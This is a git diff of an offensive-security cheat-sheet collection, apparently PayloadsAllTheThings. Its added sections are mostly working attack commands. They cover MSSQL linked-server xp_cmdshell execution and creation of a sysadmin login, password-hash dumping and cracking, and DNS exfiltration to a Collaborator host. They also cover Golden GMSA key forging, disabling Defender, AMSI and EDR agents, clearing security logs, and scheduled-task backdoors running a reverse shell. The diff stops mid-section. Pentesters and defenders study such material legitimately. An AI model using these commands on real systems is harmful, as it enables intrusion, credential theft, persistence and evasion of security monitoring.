diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index acfb662e..8438d2c4 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -25,6 +25,13 @@ - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) + ```ps1 + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + trufflehog git https://github.com/trufflesecurity/trufflehog.git + trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 + ``` ## Exploit diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 97b1fd62..5abe5f91 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na http://s3.amazonaws.com/[bucket_name]/ http://[bucket_name].s3.amazonaws.com/ http://flaws.cloud.s3.amazonaws.com/ +https://buckets.grayhatwarfare.com/ ``` Their names are also listed if the listing is enabled. diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 8bc027e6..23afbe20 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -10,6 +10,7 @@ * [Weak Password Reset Token](#weak-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset Via Username Collision](#password-reset-via-username-collision) + * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) @@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t The platform CTFd was vulnerable to this attack. See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) + +### Account takeover due to unicode normalization issue + +- Victim account: `demo@gmail.com` +- Attacker account: `demⓞ@gmail.com` + + ## Account Takeover Via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` diff --git a/Command Injection/README.md b/Command Injection/README.md index 9df048ad..e98534ae 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -18,6 +18,7 @@ * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) + * [Bypass with $()](#bypass-with--1) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Challenge](#challenge) @@ -209,6 +210,13 @@ echo $0 echo whoami|$0 ``` +### Bypass with $() +```powershell +who$()ami +who$(echo am)i +who`echo am`i +``` + #### Bypass with variable expansion ```powershell diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index e459021e..665af6c1 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### Java Bypass + +Bypass Java's URL protocol + +```powershell +url:file:///etc/passwd +url:http://127.0.0.1:8080 +``` + + ## Path Traversal ### Interesting Linux files diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 41887f65..563db1cf 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -3,6 +3,7 @@ ## Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. +:warning: `import cPickle` will only work on Python 2 ```python import cPickle @@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. ```python -import cPickle +import cPickle, os from base64 import b64encode, b64decode class Evil(object): @@ -47,4 +48,4 @@ print("Your Evil Token : {}").format(evil_token) ## References * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) -* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) \ No newline at end of file +* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ef838643..527b4f82 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -48,6 +48,7 @@ - [Password in AD User comment](#password-in-ad-user-comment) - [Reading LAPS Password](#reading-laps-password) - [Reading GMSA Password](#reading-gmsa-password) + - [Forging Golden GMSA](#forging-golden-gmsa) - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - [Using Mimikatz](#using-mimikatz) - [Using Meterpreter](#using-meterpreter) @@ -1264,9 +1265,9 @@ lsadump::lsa /inject /name:krbtgt Useful when you want to have the clear text password or when you need to make stats about weak passwords. Recommended wordlists: -- rockyou (available in Kali Linux) -- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- Weakpass.com +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell @@ -1282,7 +1283,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- ~~[hashes.org](https://hashes.org/check.php)~~ - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) @@ -1390,40 +1390,7 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### Reading GMSA Password -> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. - -#### GMSA Attributes in the Active Directory -* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. -* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. -* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. -* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. - - -#### Extract NT hash from the Active Directory - -* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) - ```ps1 - # https://github.com/rvazarkar/GMSAPasswordReader - GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT - ``` - -* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) - ```powershell - # https://github.com/micahvandeusen/gMSADumper - python3 gMSADumper.py -u User -p Password1 -d domain.local - ``` - -* Active Directory Powershell - ```ps1 - $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' - $blob = $gmsa.'msDS-ManagedPassword' - $mp = ConvertFrom-ADManagedPasswordBlob $blob - $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword - ``` - -* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module ### Reading LAPS Password @@ -1471,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} ``` - - From linux: + - From Linux: * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: ```bash @@ -1497,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` ``` + +### Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. + +#### GMSA Attributes in the Active Directory +* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. +* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. +* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +#### Extract NT hash from the Active Directory + +* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) + ```ps1 + # https://github.com/rvazarkar/GMSAPasswordReader + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) + ```powershell + # https://github.com/micahvandeusen/gMSADumper + python3 gMSADumper.py -u User -p Password1 -d domain.local + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + + +### Forging Golden GMSA + +> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. + +* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) + ```ps1 + # Enumerate all gMSAs + GoldenGMSA.exe gmsainfo + # Query for a specific gMSA + GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 + + # Dump all KDS Root Keys + GoldenGMSA.exe kdsinfo + # Dump a specific KDS Root Key + GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb + + # Compute gMSA password + # --sid : SID of the gMSA (required) + # --kdskey : Base64 encoded KDS Root Key + # --pwdid : Base64 of msds-ManagedPasswordID attribute value + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode + ``` + ### Pass-the-Ticket Golden Tickets Forging a TGT require the `krbtgt` NTLM hash @@ -3556,3 +3585,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index ca9c9e0c..65dc4d77 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -13,6 +13,10 @@ * [Enumeration methodology](#enumeration-methodology) * [Phishing with Evilginx2](#phishing-with-evilginx2) * [Illicit Consent Grant](#illicit-consent-grant) + * [Register Application](#register-application) + * [Configure Application](#configure-application) + * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) + * [Setup Vajra](#setup-vajra) * [Device Code Phish](#device-code-phish) * [Token from Managed Identity](#token-from-managed-identity) * [Azure API via Powershell](#azure-api-via-powershell) @@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS * User.ReadBasic.All * User.Read -### Setup 365-Stealer +### Setup 365-Stealer (Deprecated) :warning: Default port for 365-Stealer phishing is 443 @@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token - Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. +### Setup Vajra + +> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra + **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 485649ac..860d5b0f 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -14,6 +14,8 @@ * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) @@ -22,7 +24,7 @@ * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) @@ -54,6 +56,7 @@ * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) * [Exploiting Impersonation](#exploiting-impersonation) * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) + * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) * [References](#references) ## Identify Instances and Databases @@ -129,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv ## Linked Database +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ### Crawl Links for Instances in the Domain A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results @@ -194,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque ``` -### Command Execution via xp_cmdshell +## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami -Creates and adds local user backup to the local administrators group: -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 +# Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + ## CLR Assemblies Prerequisites: @@ -321,6 +384,8 @@ GO ## OLE Automation +* :warning: Disabled by default + ### Execute commands using OLE automation procedures ```ps1 @@ -364,9 +429,22 @@ Subsystem Options: –Subsystem Jscript ``` +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + ### List All Jobs ```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; +SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` @@ -537,8 +615,30 @@ SELECT ORIGINAL_LOGIN() SELECT SYSTEM_USER ``` +### MSSQL Accounts and Hashes + +```sql +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +``` + +Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` + +```ps1 +131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 +132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe +1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 +``` + + ## References * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5e3c9a21..8154ab57 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -8,6 +8,7 @@ * [Antivirus Removal](#antivirus-removal) * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) + * [Clear System and Security Logs](#clear-system-and-security-logs) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -31,6 +32,7 @@ * [sethc.exe](#sethc.exe) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) + * [Virtual Machines](#virtual-machines) * [Domain](#domain) * [Golden Certificate](#golden-certificate) * [Golden Ticket](#golden-ticket) @@ -55,6 +57,34 @@ PS> attrib +h mimikatz.exe * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/) * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html) +* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html) + ```ps1 + cd "C:\Program Files\Elastic\Agent\" + PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall + Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y + Elastic Agent has been uninstalled. + ``` +* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) + ```ps1 + # Global uninstall password: Password1 + Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db + Look for PasswordHash, PasswordSalt or password, salt strings. + + # Disable Cortex: Change the DLL to a random value, then REBOOT + reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f + + # Disables the agent on startup (requires reboot to work) + cytool.exe startup disable + + # Disables protection on Cortex XDR files, processes, registry and services + cytool.exe protect disable + + # Disables Cortex XDR (Even with tamper protection enabled) + cytool.exe runtime disable + + # Disables event collection + cytool.exe event_collection disable + ``` ### Disable Windows Defender @@ -64,19 +94,30 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install +# Disable scanning all downloaded files and attachments, disable AMSI (reactive) +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +PS C:\> Set-MpPreference -DisableIOAVProtection $true +# Disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f + +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + +# Remove signatures (if Internet connection is present, they will be downloaded again): +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` + ### Disable Windows Firewall ```powershell @@ -87,6 +128,13 @@ NetSh Advfirewall set allprofiles state off New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP ``` +### Clear System and Security Logs + +```powershell +cmd.exe /c wevtutil.exe cl System +cmd.exe /c wevtutil.exe cl Security +``` + ## Simple User Set a file as hidden @@ -138,36 +186,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" - ### Scheduled Tasks User -Using native **schtask** +* Using native **schtask** - Create a new task + ```powershell + # Create the scheduled tasks to run once at 00.00 + schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe + # Force run it now ! + schtasks /run /tn "Device-Synchronize" + ``` +* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks + ```powershell + # Launch an executable by calling the ShellExec_RunDLL function. + SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE + ``` -```powershell -# Create the scheduled tasks to run once at 00.00 -schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe -# Force run it now ! -schtasks /run /tn "Device-Synchronize" -``` +* Using Powershell + ```powershell + PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" + PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" + PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" + PS C:\> $S = New-ScheduledTaskSettingsSet + PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S + PS C:\> Register-ScheduledTask Backdoor -InputObject $D + ``` -Using Powershell +* Using SharPersist + ```powershell + # Add to a current scheduled task + SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add -```powershell -PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" -PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" -PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" -PS C:\> $S = New-ScheduledTaskSettingsSet -PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S -PS C:\> Register-ScheduledTask Backdoor -InputObject $D -``` - -Using SharPersist - -```powershell -# Add to a current scheduled task -SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add - -# Add new task -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly -``` + # Add new task + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly + ``` ### BITS Jobs @@ -393,6 +443,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator ``` + +### Virtual Machines + +> Based on the Shadow Bunny technique. + +```ps1 +# download virtualbox +Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe + +# perform a silent install and avoid creating desktop and quick launch icons +VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 + +# in \Program 